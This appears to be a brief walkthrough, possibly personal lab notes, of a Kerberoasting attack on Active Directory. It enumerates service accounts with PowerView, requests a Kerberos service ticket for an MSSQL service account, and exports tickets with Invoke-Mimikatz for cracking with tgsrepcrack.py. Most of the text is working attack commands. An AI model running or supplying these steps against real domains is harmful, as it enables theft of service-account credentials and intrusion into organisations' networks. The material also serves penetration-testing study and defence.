. .\\powerview.ps1

let’s extract the users run as service accounts

Get-NetUser -SPN |select cn

Untitled

now let’s extract the service principle names

Get-NetUser | Where-Object {$_.serviceprincipalname -ne $null} | select cn,serviceprincipalname

Untitled

okay now let’s try to attack one of those service first and then script the others

attacking mssql_svc

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "mssql_svc/mssqlserver.change.me"

Untitled

now let’s confirm that we have the tgs

klist

Untitled

as we see we have the ticket

now let’s use mimikatz to export all the tickets

. .\\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"kerberos::list /export"'

Untitled

now let’s use tgsrepcrack.py